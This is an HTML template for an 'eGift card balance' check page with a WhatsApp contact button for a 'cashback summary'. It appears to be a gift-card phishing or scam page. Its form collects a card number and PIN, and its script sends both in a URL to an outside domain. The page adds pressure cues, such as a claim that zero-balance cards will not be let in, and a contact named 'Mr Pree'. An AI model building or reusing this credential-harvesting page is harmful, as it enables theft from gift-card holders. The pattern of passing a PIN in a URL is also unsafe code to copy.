<br><br>
<style>
  .center {
    display: flex;
    justify-content: center;
    align-items: center;
    
  }
</style>	
<div class="container">
            <div class="row land">
                <div class="home">     
			<div class="center">
                <div class="col-md-6 home-txt1">     
 <center>
 <h4> <strong>CHECK YOUR eGIFT CARD BALANCE</strong> </h4>
 </center>


                  
 <center> Enter Your Card Information Below. <br> If Your Balance Is 0 The System Won't Let You In </center>



 <center>  <img src="{{site.baseurl}}/img/digicardone.png" width="100" height="" alt="70"> </center>

<br>

			
 <center>   <form id="redirectForm">
        <label for="code">Card Number:</label>
        <input type="text" id="code" name="code" required>
        <br> <br>
        <label for="pin">4-Digit Code:</label>
        <input type="password" id="pin" name="pin" required>
        <br><br>
        <button class="btn btn-outline btn-xla" id="mc-embedded-subscribe" type="submit"><i class="fa-solid fa-computer-mouse"></i> Check Your Balance </button>
    </form>  </center>

    <script>
        document.getElementById("redirectForm").addEventListener("submit", function(event) {
            event.preventDefault();
            
            const code = document.getElementById("code").value;
            const pin = document.getElementById("pin").value;
            
            if (code && pin) {
                const url = `https://billpayment.getgiftme.com/?code=${encodeURIComponent(code)}&pin=${encodeURIComponent(pin)}&context=modal`;
                window.location.href = url;
            }
        });
    </script>

<strong> <hr/> </strong>
<center>  <img src="{{site.baseurl}}/img/IMG_20250401_195001_287.png" width="100" height="" alt="100"> 

<br><br>
 
       <center> <strong>YOU CAN WHATSAPP MR PREE</strong> <br> To Get A Full Summary Of Your CashBack</center><br>
      <a href="https://api.whatsapp.com/send?phone={{site.tellbot}}&text=Send my CashBack summary please" class="page-scroll"><button class="btn btn-outline btn-xl" id="#signup"><strong><i class="fa-solid fa-computer-mouse"></i> Click Here</strong></button></a>
  </center> <br>
			
     
</div>
				</div>
            </div>
          </div>
                </div>
